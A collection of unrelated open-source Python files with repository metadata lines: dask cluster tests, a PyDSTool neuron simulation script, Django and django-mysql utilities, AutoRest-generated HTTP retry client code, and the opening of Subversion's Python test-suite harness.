processes=False,
scheduler_port=0,
dashboard_address=None,
)
try:
assert len(cluster.scheduler.workers) == 2
finally:
cluster.close()
def test_dont_select_closed_worker():
# Make sure distributed does not try to reuse a client from a
# closed cluster (https://github.com/dask/distributed/issues/2840).
with clean(threads=False):
cluster = LocalCluster(n_workers=0)
c = Client(cluster)
cluster.scale(2)
assert c == get_client()
c.close()
cluster.close()
cluster2 = LocalCluster(n_workers=0)
c2 = Client(cluster2)
cluster2.scale(2)
current_client = get_client()
assert c2 == current_client
cluster2.close()
c2.close()
def test_client_cluster_synchronous(loop):
with clean(threads=False):
with Client(loop=loop, processes=False) as c:
assert not c.asynchronous
assert not c.cluster.asynchronous
@pytest.mark.asyncio
async def test_scale_memory_cores(cleanup):
async with LocalCluster(
n_workers=0,
processes=False,
threads_per_worker=2,
memory_limit="2GB",
asynchronous=True,
) as cluster:
cluster.scale(cores=4)
assert len(cluster.worker_spec) == 2
cluster.scale(memory="6GB")
assert len(cluster.worker_spec) == 3
cluster.scale(cores=1)
assert len(cluster.worker_spec) == 1
cluster.scale(memory="7GB")
assert len(cluster.worker_spec) == 4
@pytest.mark.asyncio
async def test_repr(cleanup):
async with LocalCluster(
n_workers=2,
processes=False,
threads_per_worker=2,
memory_limit="2GB",
asynchronous=True,
) as cluster:
text = repr(cluster)
assert "workers=2" in text
assert cluster.scheduler_address in text
assert "cores=4" in text or "threads=4" in text
assert "GB" in text and "4" in text
async with LocalCluster(
n_workers=2, processes=False, memory_limit=None, asynchronous=True
) as cluster:
assert "memory" not in repr(cluster)
@pytest.mark.asyncio
@pytest.mark.parametrize("temporary", [True, False])
async def test_capture_security(cleanup, temporary):
if temporary:
pytest.importorskip("cryptography")
security = True
else:
security = tls_only_security()
async with LocalCluster(
n_workers=0,
silence_logs=False,
security=security,
asynchronous=True,
dashboard_address=False,
host="tls://0.0.0.0",
) as cluster:
async with Client(cluster, asynchronous=True) as client:
assert client.security == cluster.security
@pytest.mark.asyncio
@pytest.mark.skipif(
sys.version_info < (3, 7), reason="asyncio.all_tasks not implemented"
)
async def test_no_danglng_asyncio_tasks(cleanup):
start = asyncio.all_tasks()
async with LocalCluster(asynchronous=True, processes=False):
await asyncio.sleep(0.01)
tasks = asyncio.all_tasks()
assert tasks == start
@pytest.mark.asyncio
async def test_async_with():
async with LocalCluster(processes=False, asynchronous=True) as cluster:
w = cluster.workers
assert w
assert not w
| blaze/distributed | distributed/deploy/tests/test_local.py | Python | bsd-3-clause | 29,495 | 0.000712 |
"""
Human cortical neuron using A-current model in reduced, 2D version of Hodgkin-Huxley model
Section 9.5
"""
from __future__ import division
from PyDSTool import *
from PyDSTool.Toolbox.phaseplane import *
from common_lib import *
import Ch9_HH_red
import Ch9_HH
gentype='vode' # dopri, euler, etc.
# Parameter An = noise amplitude
# As = sine wave amplitude
# f = frequency, should be >= 50 Hz
par_args = {'tau_v': 1, 'tau_r': 5.6,
'As': 0, 'f': 700, 'An': 0., 'Iapp': 0.8}
ic_args = {'v':-0.8, 'r': 0.25}
def test_I(gen, Iapp, tmax=300, silent=False):
geb.set(pars={'Iapp': Iapp},
tdata=[0,tmax])
traj = gen.compute('test')
pts = traj.sample()
f = freq(traj)
if not silent:
plt.clf()
plt.plot(pts['t'], pts['v'], 'b')
plt.ylim([-0.85, 0.4])
print "Frequency response was:", f
return f
# original version
HH = Ch9_HH.makeHHneuron('HH', par_args, ic_args, const_I=True,
gentype=gentype)
# 2D reduced version
HHred = Ch9_HH_red.makeHHneuron('HHred', par_args, ic_args, const_I=True,
gentype=gentype)
# vary Iapp up to 2
# 0.791 is the closest to the saddle-node bif point to 3 decimal places
test_I(0.791, 500)
plt.show()
| robclewley/compneuro | Ch9_HH_compare.py | Python | bsd-3-clause | 1,267 | 0.007893 |
from django import template
from filemanager.models import fileobject
from django.shortcuts import get_object_or_404, render_to_response
from django.template.loader import render_to_string
from django.contrib.contenttypes.models import ContentType
register = template.Library()
def raw_text(context):
project=context['object']
object_type = ContentType.objects.get_for_model(project)
projectfiles = fileobject.objects.filter(content_type=object_type,object_id=project.id, filetype="text")
textlist = ""
for i in projectfiles:
textlist = textlist+i.filename.read()
return textlist
register.simple_tag(takes_context=True)(raw_text)
| Rhombik/rhombik-object-repository | searchsettings/templatetags/addSearchContext.py | Python | agpl-3.0 | 669 | 0.014948 |
from __future__ import annotations
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.db.migrations.operations.base import Operation
from django.db.migrations.state import ModelState
from django.utils.functional import cached_property
class InstallPlugin(Operation):
reduces_to_sql = False
reversible = True
def __init__(self, name: str, soname: str) -> None:
self.name = name
self.soname = soname
def state_forwards(self, app_label: str, state: ModelState) -> None:
pass # pragma: no cover
def database_forwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_st: ModelState,
to_st: ModelState,
) -> None:
if not self.plugin_installed(schema_editor):
schema_editor.execute(
f"INSTALL PLUGIN {self.name} SONAME %s", (self.soname,)
)
def database_backwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_st: ModelState,
to_st: ModelState,
) -> None:
if self.plugin_installed(schema_editor):
schema_editor.execute("UNINSTALL PLUGIN %s" % self.name)
def plugin_installed(self, schema_editor: BaseDatabaseSchemaEditor) -> bool:
with schema_editor.connection.cursor() as cursor:
cursor.execute(
"""SELECT COUNT(*)
FROM INFORMATION_SCHEMA.PLUGINS
WHERE PLUGIN_NAME LIKE %s""",
(self.name,),
)
count = cursor.fetchone()[0]
return count > 0
def describe(self) -> str:
return f"Installs plugin {self.name} from {self.soname}"
class InstallSOName(Operation):
reduces_to_sql = True
reversible = True
def __init__(self, soname: str) -> None:
self.soname = soname
def state_forwards(self, app_label: str, state: ModelState) -> None:
pass # pragma: no cover
def database_forwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_st: ModelState,
to_st: ModelState,
) -> None:
schema_editor.execute("INSTALL SONAME %s", (self.soname,))
def database_backwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_st: ModelState,
to_st: ModelState,
) -> None:
schema_editor.execute("UNINSTALL SONAME %s", (self.soname,))
def describe(self) -> str:
return "Installs library %s" % (self.soname)
class AlterStorageEngine(Operation):
def __init__(
self, name: str, to_engine: str, from_engine: str | None = None
) -> None:
self.name = name
self.engine = to_engine
self.from_engine = from_engine
@property
def reversible(self) -> bool:
return self.from_engine is not None
def state_forwards(self, app_label: str, state: ModelState) -> None:
pass
def database_forwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_state: ModelState,
to_state: ModelState,
) -> None:
self._change_engine(app_label, schema_editor, to_state, engine=self.engine)
def database_backwards(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
from_state: ModelState,
to_state: ModelState,
) -> None:
if self.from_engine is None:
raise NotImplementedError("You cannot reverse this operation")
self._change_engine(app_label, schema_editor, to_state, engine=self.from_engine)
def _change_engine(
self,
app_label: str,
schema_editor: BaseDatabaseSchemaEditor,
to_state: ModelState,
engine: str,
) -> None:
new_model = to_state.apps.get_model(app_label, self.name)
qn = schema_editor.connection.ops.quote_name
if self.allow_migrate_model( # pragma: no branch
schema_editor.connection.alias, new_model
):
with schema_editor.connection.cursor() as cursor:
cursor.execute(
"""SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME = %s AND
ENGINE = %s""",
(new_model._meta.db_table, engine),
)
uses_engine_already = cursor.fetchone()[0] > 0
if uses_engine_already:
return
schema_editor.execute(
"ALTER TABLE {table} ENGINE={engine}".format(
table=qn(new_model._meta.db_table),
engine=engine,
)
)
@cached_property
def name_lower(self) -> str:
return self.name.lower()
def references_model(self, name: str, app_label: str | None = None) -> bool:
return name.lower() == self.name_lower
def describe(self) -> str:
if self.from_engine:
from_clause = f" from {self.from_engine}"
else:
from_clause = ""
return "Alter storage engine for {model}{from_clause} to {engine}".format(
model=self.name, from_clause=from_clause, engine=self.engine
)
| adamchainz/django-mysql | src/django_mysql/operations.py | Python | mit | 5,386 | 0.000928 |
OPEN = "mate-open"
FILE_MANAGER = "caja"
| hanya/BookmarksMenu | pythonpath/bookmarks/env/mate.py | Python | apache-2.0 | 42 | 0 |
#!/usr/bin/python2.7
print "__init__"
# __all__ = ['p2']
from big import *
| qrsforever/workspace | python/learn/base/module/l1/pack/__init__.py | Python | mit | 78 | 0.012821 |
PROJECT_DEFAULTS = 'Project Defaults'
PATHS = 'Paths'
_from_config = {
'author': None,
'email': None,
'license': None,
'language': None,
'type': None,
'parent': None,
'vcs': None,
'footprints': None
}
_from_args = {
'name': None,
'author': None,
'email': None,
'license': None,
'language': None,
'type': None,
'parent': None,
'vcs': None,
'footprint': None
}
def load_args(args):
from_args = _from_args.copy()
keys = _from_args.keys()
for key in keys:
if args.__contains__(key):
from_args[key] = args.__getattribute__(key)
return from_args
def load_config(config):
from_config = _from_config.copy()
keys = _from_config.keys()
if config:
if config.has_section(PROJECT_DEFAULTS):
for key in keys:
if config.has_option(PROJECT_DEFAULTS, key):
from_config[key] = config.get(PROJECT_DEFAULTS, key)
if config.has_section(PATHS):
for key in keys:
if config.has_option(PATHS, key):
from_config[key] = config.get(PATHS, key)
return from_config
def merge_configged_argged(configged, argged):
merged = configged.copy()
for key in argged.keys():
if True in [key == k for k in configged.keys()]:
# We only care about a None val if the key exists in configged
# this will overwrite the config so that args take percedence
if argged[key] is not None:
merged[key] = argged[key]
else:
# If the key is not already here, then it must be 'footprint', in
# which case we definitely want to include it since that is our
# highest priority and requires less args to generate a project
merged[key] = argged[key]
return merged
def footprint_requires(merged):
required = ['name', 'parent']
passed = 0
pass_requires = len(required)
for r in required:
if r in merged.keys():
if merged[r] is not None:
passed += 1
return passed == pass_requires
def solo_args_requires(args):
required = ['name', 'parent', 'language', 'type']
passed = 0
pass_requires = len(required)
for r in required:
if r in args.keys():
if args[r] is not None:
passed += 1
return passed == pass_requires
def validate_args(args, config):
if config is not None:
configged = load_config(config)
argged = load_args(args)
merged = merge_configged_argged(configged, argged)
# If footprint is provided, we only need name and parent
if merged['footprint'] is not None:
return footprint_requires(merged), merged
# If no footprint, we need name, parent, language, and type to perform
# footprint lookups
if None not in [merged['name'], merged['parent'], merged['language'],
merged['type']]:
return True, merged
return False, merged
argged = load_args(args)
return solo_args_requires(argged), argged
| shaggytwodope/progeny | validators.py | Python | gpl-3.0 | 3,149 | 0 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from .. import models
class HttpRetry(object):
"""HttpRetry operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def head408(
self, custom_headers=None, raw=False, **operation_config):
"""
Return 408 status code, then 200 after retry
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/408'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.head(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def put500(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 500 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/500'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_content = None
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def patch500(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 500 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/500'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_content = None
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def get502(
self, custom_headers=None, raw=False, **operation_config):
"""
Return 502 status code, then 200 after retry
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/502'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def post503(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 503 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/503'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_content = None
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete503(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 503 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/503'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_content = None
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def put504(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 504 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/504'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_content = None
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def patch504(
self, boolean_value=None, custom_headers=None, raw=False, **operation_config):
"""
Return 504 status code, then 200 after retry
:param boolean_value: Simple boolean value true
:type boolean_value: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/http/retry/504'
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if boolean_value is not None:
body_content = self._serialize.body(boolean_value, 'bool')
else:
body_content = None
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
| sharadagarwal/autorest | AutoRest/Generators/Python/Python.Tests/Expected/AcceptanceTests/Http/autoresthttpinfrastructuretestservice/operations/http_retry.py | Python | mit | 13,601 | 0.000588 |
#
# main.py: a shared, automated test suite for Subversion
#
# Subversion is a tool for revision control.
# See http://subversion.tigris.org for more information.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
######################################################################
import sys
import os
import shutil
import re
import stat
import subprocess
import time
import threading
import optparse
import xml
import urllib
import logging
import hashlib
from urlparse import urlparse
try:
# Python >=3.0
import queue
from urllib.parse import quote as urllib_parse_quote
from urllib.parse import unquote as urllib_parse_unquote
except ImportError:
# Python <3.0
import Queue as queue
from urllib import quote as urllib_parse_quote
from urllib import unquote as urllib_parse_unquote
import svntest
from svntest import Failure
from svntest import Skip
SVN_VER_MINOR = 8
######################################################################
#
# HOW TO USE THIS MODULE:
#
# Write a new python script that
#
# 1) imports this 'svntest' package
#
# 2) contains a number of related 'test' routines. (Each test
# routine should take no arguments, and return None on success
# or throw a Failure exception on failure. Each test should
# also contain a short docstring.)
#
# 3) places all the tests into a list that begins with None.
#
# 4) calls svntest.main.client_test() on the list.
#
# Also, your tests will probably want to use some of the common
# routines in the 'Utilities' section below.
#
#####################################################################
# Global stuff
default_num_threads = 5
# Don't try to use this before calling execute_tests()
logger = None
class SVNProcessTerminatedBySignal(Failure):
"Exception raised if a spawned process segfaulted, aborted, etc."
pass
class SVNLineUnequal(Failure):
"Exception raised if two lines are unequal"
pass
class SVNUnmatchedError(Failure):
"Exception raised if an expected error is not found"
pass
class SVNCommitFailure(Failure):
"Exception raised if a commit failed"
pass
class SVNRepositoryCopyFailure(Failure):
"Exception raised if unable to copy a repository"
pass
class SVNRepositoryCreateFailure(Failure):
"Exception raised if unable to create a repository"
pass
# Windows specifics
if sys.platform == 'win32':
windows = True
file_scheme_prefix = 'file:'
_exe = '.exe'
_bat = '.bat'
os.environ['SVN_DBG_STACKTRACES_TO_STDERR'] = 'y'
else:
windows = False
file_scheme_prefix = 'file://'
_exe = ''
_bat = ''
# The location of our mock svneditor script.
if windows:
svneditor_script = os.path.join(sys.path[0], 'svneditor.bat')
else:
svneditor_script = os.path.join(sys.path[0], 'svneditor.py')
# Username and password used by the working copies
wc_author = 'jrandom'
wc_passwd = 'rayjandom'
# Username and password used by the working copies for "second user"
# scenarios
wc_author2 = 'jconstant' # use the same password as wc_author
stack_trace_regexp = r'(?:.*subversion[\\//].*\.c:[0-9]*,$|.*apr_err=.*)'
# Set C locale for command line programs
os.environ['LC_ALL'] = 'C'
######################################################################
# The locations of the svn, svnadmin and svnlook binaries, relative to
# the only scripts that import this file right now (they live in ../).
# Use --bin to override these defaults.
svn_binary = os.path.abspath('../../svn/svn' + _exe)
svnadmin_binary = os.path.abspath('../../svnadmin/svnadmin' + _exe)
svnlook_binary = os.path.abspath('../../svnlook/svnlook' + _exe)
svnrdump_binary = os.path.abspath('../../svnrdump/svnrdump' + _exe)
svnsync_binary = os.path.abspath('../../svnsync/svnsync' + _exe)
svnversion_binary = os.path.abspath('../../svnversion/svnversion' + _exe)
svndumpfilter_binary = os.path.abspath('../../svndumpfilter/svndumpfilter' + \
_exe)
svnmucc_binary=os.path.abspath('../../svnmucc/svnmucc' + _exe)
entriesdump_binary = os.path.abspath('entries-dump' + _exe)
atomic_ra_revprop_change_binary = os.path.abspath('atomic-ra-revprop-change' + \
_exe)
wc_lock_tester_binary = os.path.abspath('../libsvn_wc/wc-lock-tester' + _exe)
wc_incomplete_tester_binary = os.path.abspath('../libsvn_wc/wc-incomplete-tester' + _exe)
######################################################################
# The location of svnauthz binary, relative to the only scripts that
# import this file right now (they live in ../).
# Use --tools to overide these defaults.
svnauthz_binary = os.path.abspath('../../../tools/server-side/svnauthz' + _exe)
svnauthz_validate_binary = os.path.abspath(
'../../../tools/server-side/svnauthz-validate' + _exe
)
# Location to the pristine repository, will be calculated from test_area_url
# when we know what the user specified for --url.
pristine_greek_repos_url = None
# Global variable to track all of our options
options = None
# End of command-line-set global variables.
######################################################################
# All temporary repositories and working copies are created underneath
# this dir, so there's one point at which to mount, e.g., a ramdisk.
work_dir = "svn-test-work"
# Constant for the merge info property.
SVN_PROP_MERGEINFO = "svn:mergeinfo"
# Constant for the inheritable auto-props property.
SVN_PROP_INHERITABLE_AUTOPROPS = "svn:auto-props"
# Constant for the inheritable ignores property.
SVN_PROP_INHERITABLE_IGNORES = "svn:global-ignores"
# Where we want all the repositories and working copies to live.
# Each test will have its own!
general_repo_dir = os.path.join(work_dir, "repositories")
general_wc_dir = os.path.join(work_dir, "working_copies")
# temp directory in which we will create our 'pristine' local
# repository and other scratch data. This should be removed when we
# quit and when we startup.
temp_dir = os.path.join(work_dir, 'local_tmp')
# (derivatives of the tmp dir.)
pristine_greek_repos_dir = os.path.join(temp_dir, "repos")
greek_dump_dir = os.path.join(temp_dir, "greekfiles")
default_config_dir = os.path.abspath(os.path.join(temp_dir, "config"))
#
# Our pristine greek-tree state.
#
# If a test wishes to create an "expected" working-copy tree, it should
# call main.greek_state.copy(). That method will return a copy of this
# State object which can then be edited.
#
_item = svntest.wc.StateItem
greek_state = svntest.wc.State('', {
'iota' : _item("This is the file 'iota'.\n"),
'A' : _item(),
'A/mu' : _item("This is the file 'mu'.\n"),
'A/B' : _item(),
'A/B/lambda' : _item("This is the file 'lambda'.\n"),
'A/B/E' : _item(),
'A/B/E/alpha' : _item("This is the file 'alpha'.\n"),
'A/B/E/beta' : _item("This is the file 'beta'.\n"),
'A/B/F' : _item(),
'A/C' : _item(),
'A/D' : _item(),
'A/D/gamma' : _item("This is the file 'gamma'.\n"),
'A/D/G' : _item(),
'A/D/G/pi' : _item("This is the file 'pi'.\n"),
'A/D/G/rho' : _item("This is the file 'rho'.\n"),
'A/D/G/tau' : _item("This is the file 'tau'.\n"),
'A/D/H' : _item(),
'A/D/H/chi' : _item("This is the file 'chi'.\n"),
'A/D/H/psi' : _item("This is the file 'psi'.\n"),
'A/D/H/omega' : _item("This is the file 'omega'.\n"),
})
######################################################################
# Utilities shared by the tests
def wrap_ex(func, output):
"Wrap a function, catch, print and ignore exceptions"
def w(*args, **kwds):
try:
return func(*args, **kwds)
except Failure, ex:
if ex.__class__ != Failure or ex.args:
ex_args = str(ex)
if ex_args:
logger.warn('EXCEPTION: %s: %s', ex.__class__.__name__, ex_args)
else:
logger.warn('EXCEPTION: %s', ex.__class__.__name__)
return w
def setup_development_mode():
"Wraps functions in module actions"
l = [ 'run_and_verify_svn',
'run_and_verify_svnversion',
'run_and_verify_load',
'run_and_verify_dump',
'run_and_verify_checkout',
'run_and_verify_export',
'run_and_verify_update',
'run_and_verify_merge',
'run_and_verify_switch',
'run_and_verify_commit',
'run_and_verify_unquiet_status',
'run_and_verify_status',
'run_and_verify_diff_summarize',
'run_and_verify_diff_summarize_xml',
'run_and_validate_lock']
for func in l:
setattr(svntest.actions, func, wrap_ex(getattr(svntest.actions, func)))
def get_admin_name():
"Return name of SVN administrative subdirectory."
if (windows or sys.platform == 'cygwin') \
and 'SVN_ASP_DOT_NET_HACK' in os.environ:
return '_svn'
else:
return '.svn'
def wc_is_singledb(wcpath):
"""Temporary function that checks whether a working copy directory looks
like it is part of a single-db working copy."""
pristine = os.path.join(wcpath, get_admin_name(), 'pristine')
if not os.path.exists(pristine):
return True
# Now we must be looking at a multi-db WC dir or the root dir of a
# single-DB WC. Sharded 'pristine' dir => single-db, else => multi-db.
for name in os.listdir(pristine):
if len(name) == 2:
return True
elif len(name) == 40:
return False
return False
def get_start_commit_hook_path(repo_dir):
"Return the path of the start-commit-hook conf file in REPO_DIR."
return os.path.join(repo_dir, "hooks", "start-commit")
def get_pre_commit_hook_path(repo_dir):
"Return the path of the pre-commit-hook conf file in REPO_DIR."
return os.path.join(repo_dir, "hooks", "pre-commit")
def get_post_commit_hook_path(repo_dir):
"Return the path of the post-commit-hook conf file in REPO_DIR."
return os.path.join(repo_dir, "hooks", "post-commit")
def get_pre_revprop_change_hook_path(repo_dir):
"Return the path of the pre-revprop-change hook script in REPO_DIR."
return os.path.join(repo_dir, "hooks", "pre-revprop-change")
def get_pre_lock_hook_path(repo_dir):
"Return the path of the pre-lock hook script in REPO_DIR."
return os.path.join(repo_dir, "hooks", "pre-lock")
def get_pre_unlock_hook_path(repo_dir):
"Return the path of the pre-unlock hook script in REPO_DIR."
return os.path.join(repo_dir, "hooks", "pre-unlock")
def get_svnserve_conf_file_path(repo_dir):
"Return the path of the svnserve.conf file in REPO_DIR."
return os.path.join(repo_dir, "conf", "svnserve.conf")
def get_fsfs_conf_file_path(repo_dir):
"Return the path of the fsfs.conf file in REPO_DIR."
return os.path.join(repo_dir, "db", "fsfs.conf")
def get_fsfs_format_file_path(repo_dir):
"Return the path of the format file in REPO_DIR."
return os.path.join(repo_dir, "db", "format")
def filter_dbg(lines):
excluded = filter(lambda line: line.startswith('DBG:'), lines)
included = filter(lambda line: not line.startswith('DBG:'), lines)
sys.stdout.write(''.join(excluded))
return included
# Run any binary, logging the command line and return code
def run_command(command, error_expected, binary_mode=False, *varargs):
"""Run COMMAND with VARARGS. Return exit code as int; stdout, stderr
as lists of lines (including line terminators). See run_command_stdin()
for details. If ERROR_EXPECTED is None, any stderr output will be
printed and any stderr output or a non-zero exit code will raise an
exception."""
return run_command_stdin(command, error_expected, 0, binary_mode,
None, *varargs)
# A regular expression that matches arguments that are trivially safe
# to pass on a command line without quoting on any supported operating
# system:
_safe_arg_re = re.compile(r'^[A-Za-z\d\.\_\/\-\:\@]+$')
def _quote_arg(arg):
"""Quote ARG for a command line.
Return a quoted version of the string ARG, or just ARG if it contains
only universally harmless characters.
WARNING: This function cannot handle arbitrary command-line
arguments: it is just good enough for what we need here."""
arg = str(arg)
if _safe_arg_re.match(arg):
return arg
if windows:
# Note: subprocess.list2cmdline is Windows-specific.
return subprocess.list2cmdline([arg])
else:
# Quoting suitable for most Unix shells.
return "'" + arg.replace("'", "'\\''") + "'"
def open_pipe(command, bufsize=-1, stdin=None, stdout=None, stderr=None):
"""Opens a subprocess.Popen pipe to COMMAND using STDIN,
STDOUT, and STDERR. BUFSIZE is passed to subprocess.Popen's
argument of the same name.
Returns (infile, outfile, errfile, waiter); waiter
should be passed to wait_on_pipe."""
command = [str(x) for x in command]
# On Windows subprocess.Popen() won't accept a Python script as
# a valid program to execute, rather it wants the Python executable.
if (sys.platform == 'win32') and (command[0].endswith('.py')):
command.insert(0, sys.executable)
command_string = command[0] + ' ' + ' '.join(map(_quote_arg, command[1:]))
if not stdin:
stdin = subprocess.PIPE
if not stdout:
stdout = subprocess.PIPE
if not stderr:
stderr = subprocess.PIPE
p = subprocess.Popen(command,
